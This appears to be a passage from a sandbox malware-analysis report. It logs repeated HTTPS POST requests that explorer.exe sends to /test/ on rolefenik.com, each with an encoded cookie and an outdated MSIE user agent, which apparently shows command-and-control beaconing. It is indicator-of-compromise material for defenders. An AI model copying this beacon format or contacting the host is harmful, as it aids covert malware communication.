                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1ded4acc8f2cdc-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1299&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=1894048&cwnd=251&unsent_bytes=0&cid=a721143587b1973e&ts=1950&x=0"
                                                                                                                                                          2024-11-13 10:02:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          11192.168.2.858097172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:36 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1kCqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:38 UTC791INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:38 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z8iHmXR59w%2FlmfaCilGUidk5OPi3Mn%2BKs%2Fb55%2FpOV0E9GlvbgwKq6iFB0NbF7T1EzSwC23N8aeN%2F8jXqhnyTAHiRPvJCLSc2iFRfk1nOh%2BGPKC%2BVP%2BFC672ZD2G07cLM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1ded5b4a7f46cb-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1631&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1052&delivery_rate=1741431&cwnd=251&unsent_bytes=0&cid=fc3548cc8710f291&ts=1835&x=0"
                                                                                                                                                          2024-11-13 10:02:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          12192.168.2.858098172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:39 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1kCaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:41 UTC783INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:41 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B3eemjTtERrfRkqh%2BBfqNnR44Vfe9SediEL8CHo7aJo3DLt%2BmCwlvBqvYOlNwK8prXqd0ICrgWixrNWyidj2GVodKUwn8uZ4AwFVBjqtjazAdDKr%2BD%2B1oEGmJA4EOPTE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1ded6b08c2469e-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1033&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=2693953&cwnd=251&unsent_bytes=0&cid=7e7ce1e5175ba1fb&ts=2549&x=0"
                                                                                                                                                          2024-11-13 10:02:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          13192.168.2.858100172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:42 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1kCKEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:44 UTC779INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:44 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YaOWI46aqhtA329hOafabtmesEDrfJahkYcq0A2Zq6BZYCJMNzbNA4UBoIYMPjrZrvX2rZELoRV2WzUsrlSrVT4Za7wqcfRh4e1%2Fu1X%2BrGWq4kbFONUkCwizkKsRsvOR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1ded7f3c5eeae9-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1186&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=2095513&cwnd=242&unsent_bytes=0&cid=6f8dff0d09c5224e&ts=2047&x=0"
                                                                                                                                                          2024-11-13 10:02:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          14192.168.2.858101172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:45 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1kD6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:47 UTC783INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:47 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C5WafbEljz3Ww1u5a7NF5tNBXgsPJH%2FbeOXCDV1pcA4zPp1nNwtc8D%2BqsFTeK%2F%2ByZE69KWIc6HqAYO5ZttbJNvzVK0z5al0Gj2U5cxBN0toPL9QB1q33diAEgHGKDeHl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1ded90ebf1e946-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1296&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=2192278&cwnd=251&unsent_bytes=0&cid=dab77eba5d96a2fe&ts=2036&x=0"
                                                                                                                                                          2024-11-13 10:02:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          15192.168.2.858102172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:47 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1kDqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:49 UTC785INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:49 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VSu2ecLUuEYPHT7tNfYYYlLCHniSszTjF05ho6p7r7sn%2FGgyE5hBMwf2Q0jWOWJPL8ZFcLs%2BOX8HJbDeGrGIHET%2BWVW5n0et%2B0VZ7BZgoa2NkZ2r%2FX4S6CUCharYlu7n"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1deda16b94463b-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1043&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1052&delivery_rate=2696461&cwnd=241&unsent_bytes=0&cid=082789492961d297&ts=1992&x=0"
                                                                                                                                                          2024-11-13 10:02:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          16192.168.2.858103172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:50 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1kDaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:52 UTC781INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:52 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=882NnKdDPdv21p3fzjHnt5NRkjokr0XhTYN2MLZ4pIzVMHqTOPpwE4uxVBLVttvQw9%2FbVDVfBZIFRjPrURHU%2FlSs1iDUaOcTpA2fMaDtEedPBwmhTBdQB52rR8HSeVj%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dedb21b57475b-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1824&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1052&delivery_rate=1576483&cwnd=251&unsent_bytes=0&cid=d211a079c1c66077&ts=2122&x=0"
                                                                                                                                                          2024-11-13 10:02:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          17192.168.2.858104172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:53 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1kDKEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:55 UTC783INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:55 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZqjpyTOpfOS8eNQVSPSmCuVP2L4vQfcd5qc3VU%2B4ShRjc0zJUstkIIxhLMoBCH4to7LvcWkUNTkoJlpbG%2B3rLxs0r7Hc81nly34HhyIoi1vQcF%2FcOgJQKCMZVeb%2BRIw1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dedc4393947a6-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1722&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1052&delivery_rate=1384983&cwnd=242&unsent_bytes=0&cid=40b8d6c7606dba96&ts=1829&x=0"
                                                                                                                                                          2024-11-13 10:02:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          18192.168.2.858105172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:56 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1kA6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:58 UTC779INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:58 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lPIOval8S5pLOxJGljhXDoOqOntAlbDXOeqRbqQ9z5lbwabe8gEfHKdwdk4whJhTIYE%2BWYshb7CIPINY5jw%2BCrd8jzXpyOnDNgdBj7GWbEL3iii5mJ6BPYa7XzBUYK17"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dedd6ae936be4-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1063&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=2604316&cwnd=251&unsent_bytes=0&cid=9a0154bfd19c016f&ts=2033&x=0"
                                                                                                                                                          2024-11-13 10:02:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          19192.168.2.858106172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:59 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1kAqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:03:01 UTC783INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:03:01 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FtjB9XCsLuDJM4gGErxgCrArfaPwNqEEsuvpQHbUeIOJZYhBGLVwuCsgyvxUr7owjo8bn40KHdbuAgMdGEodOI2Znkk%2BbxKRLvx1Vf9weavaf%2BDwfpQtABlkmrlh%2BAtR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dede82b6f3ad3-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1278&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=2177443&cwnd=251&unsent_bytes=0&cid=8ba24d9a3c4788c1&ts=2384&x=0"
                                                                                                                                                          2024-11-13 10:03:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          20192.168.2.858107172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:03:02 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1nC6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:03:04 UTC779INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:03:04 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jk6kOhm6CGibthh1jGdT2PdNUn1bBkXNBFxN6CQOOBE5C3dSHZH%2BqU8oNwzvcLTJ1xaeB9YdN75NnzIdSRGgMr61GWrWMcxoVX9djX9yBm5OvnBNnil0n4Kz60Q6IKm%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dedfb7bb22cc3-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1584&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1052&delivery_rate=1721759&cwnd=251&unsent_bytes=0&cid=acf1e0eebc5e9f10&ts=2366&x=0"
                                                                                                                                                          2024-11-13 10:03:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          21192.168.2.858108172.67.191.232443
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:03:05 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1nCqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:03:07 UTC785INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:03:07 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3mWtjctBqwE%2FIhSXDXWjqfNYJwsOGlq54BLL2Mj6VZa4eG4buPANxyEUiaa0unhWVOcLJU%2BpDL9KH%2BBS7iSSzn0f%2BeaaJsGPp5OjPUgbbUd2uwhj5PVL%2Bz6XszmtWpOm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dee0e9fda2cae-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=1886644&cwnd=251&unsent_bytes=0&cid=6dfcc76621d22b21&ts=2328&x=0"
                                                                                                                                                          2024-11-13 10:03:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          22192.168.2.858109172.67.191.232443
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:03:08 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1nCaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:03:11 UTC781INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:03:11 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yqo9paPRpoKsQq4aj1j0ZyOeMIrm2YzlyX0%2Bq5zzz3ufWlZmq4QEBNXFw8VtYjstuOd5hFROFAreFTFj36sgEZ7FY0jbeNqxLPKB10ek6zUWM06ZcTVqehE%2B9y2%2BcE7b"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dee2159858d29-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
